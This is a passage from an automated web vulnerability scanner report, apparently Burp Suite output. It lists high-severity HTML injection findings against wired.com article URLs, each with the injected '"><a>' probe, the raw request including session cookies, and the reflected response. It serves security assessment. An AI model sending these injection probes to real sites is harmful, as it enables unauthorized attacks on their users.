Expires: Sun, 21 Nov 2010 23:19:58 GMT
Date: Sun, 21 Nov 2010 23:09:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newse9994"><a>6e128528801">
...[SNIP]...

1.692. http://www.wired.com/science/discoveries/news/2007/12/dayintech_1217 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/12/dayintech_1217

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb7bd"><a>1e8eec37d12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencebb7bd"><a>1e8eec37d12/discoveries/news/2007/12/dayintech_1217 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:07 GMT
Date: Sun, 21 Nov 2010 23:11:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencebb7bd"><a>1e8eec37d12 ss_discoveries c_news">
...[SNIP]...

1.693. http://www.wired.com/science/discoveries/news/2007/12/dayintech_1217 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/12/dayintech_1217

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d62a"><a>5c65a610 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries6d62a"><a>5c65a610/news/2007/12/dayintech_1217 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29315
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:23 GMT
Date: Sun, 21 Nov 2010 23:11:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries6d62a"><a>5c65a610 c_news">
...[SNIP]...

1.694. http://www.wired.com/science/discoveries/news/2007/12/dayintech_1217 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/12/dayintech_1217

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43dd8"><a>9084cb4edf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news43dd8"><a>9084cb4edf/2007/12/dayintech_1217 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:33 GMT
Date: Sun, 21 Nov 2010 23:11:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news43dd8"><a>9084cb4edf">
...[SNIP]...

1.695. http://www.wired.com/science/discoveries/news/2008/02/dayintech_0226 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/02/dayintech_0226

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 266e8"><a>afe4e6938d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science266e8"><a>afe4e6938d/discoveries/news/2008/02/dayintech_0226 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:08 GMT
Date: Sun, 21 Nov 2010 23:12:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science266e8"><a>afe4e6938d ss_discoveries c_news">
...[SNIP]...

1.696. http://www.wired.com/science/discoveries/news/2008/02/dayintech_0226 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/02/dayintech_0226

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1030"><a>70ba086e197 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesb1030"><a>70ba086e197/news/2008/02/dayintech_0226 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:25 GMT
Date: Sun, 21 Nov 2010 23:12:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesb1030"><a>70ba086e197 c_news">
...[SNIP]...

1.697. http://www.wired.com/science/discoveries/news/2008/02/dayintech_0226 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/02/dayintech_0226

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59c5e"><a>b29ca90e37a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news59c5e"><a>b29ca90e37a/2008/02/dayintech_0226 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:37 GMT
Date: Sun, 21 Nov 2010 23:12:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news59c5e"><a>b29ca90e37a">
...[SNIP]...

1.698. http://www.wired.com/science/discoveries/news/2008/03/dayintech_0321 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/03/dayintech_0321

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cda9"><a>f470b0d8cd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science4cda9"><a>f470b0d8cd7/discoveries/news/2008/03/dayintech_0321 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:15 GMT
Date: Sun, 21 Nov 2010 23:12:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science4cda9"><a>f470b0d8cd7 ss_discoveries c_news">
...[SNIP]...

1.699. http://www.wired.com/science/discoveries/news/2008/03/dayintech_0321 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/03/dayintech_0321

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff5b1"><a>73c8031883a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesff5b1"><a>73c8031883a/news/2008/03/dayintech_0321 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:34 GMT
Date: Sun, 21 Nov 2010 23:12:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesff5b1"><a>73c8031883a c_news">
...[SNIP]...

1.700. http://www.wired.com/science/discoveries/news/2008/03/dayintech_0321 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/03/dayintech_0321

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69c62"><a>a1fbb2dbf1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news69c62"><a>a1fbb2dbf1f/2008/03/dayintech_0321 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:45 GMT
Date: Sun, 21 Nov 2010 23:12:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news69c62"><a>a1fbb2dbf1f">
...[SNIP]...

1.701. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0505 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/05/dayintech_0505

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71a7"><a>db01b03a6b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencea71a7"><a>db01b03a6b2/discoveries/news/2008/05/dayintech_0505 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:22 GMT
Date: Sun, 21 Nov 2010 23:11:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencea71a7"><a>db01b03a6b2 ss_discoveries c_news">
...[SNIP]...

1.702. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0505 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/05/dayintech_0505

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e4ac"><a>5182a879937 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries5e4ac"><a>5182a879937/news/2008/05/dayintech_0505 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:37 GMT
Date: Sun, 21 Nov 2010 23:11:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries5e4ac"><a>5182a879937 c_news">
...[SNIP]...

1.703. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0505 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/05/dayintech_0505

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b05d8"><a>5b5e97a1820 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newsb05d8"><a>5b5e97a1820/2008/05/dayintech_0505 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:47 GMT
Date: Sun, 21 Nov 2010 23:11:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsb05d8"><a>5b5e97a1820">
...[SNIP]...

1.704. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0507 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/05/dayintech_0507

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10ff3"><a>453721659f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science10ff3"><a>453721659f6/discoveries/news/2008/05/dayintech_0507 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:27 GMT
Date: Sun, 21 Nov 2010 23:11:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science10ff3"><a>453721659f6 ss_discoveries c_news">
...[SNIP]...

1.705. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0507 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/05/dayintech_0507

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d1cb"><a>508326e35f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries4d1cb"><a>508326e35f3/news/2008/05/dayintech_0507 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:42 GMT
Date: Sun, 21 Nov 2010 23:11:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries4d1cb"><a>508326e35f3 c_news">
...[SNIP]...

1.706. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0507 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/05/dayintech_0507

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc419"><a>7899aecd94e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newscc419"><a>7899aecd94e/2008/05/dayintech_0507 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:53 GMT
Date: Sun, 21 Nov 2010 23:11:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newscc419"><a>7899aecd94e">
...[SNIP]...

1.707. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0508 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/05/dayintech_0508

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7763"><a>37b818daaa2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

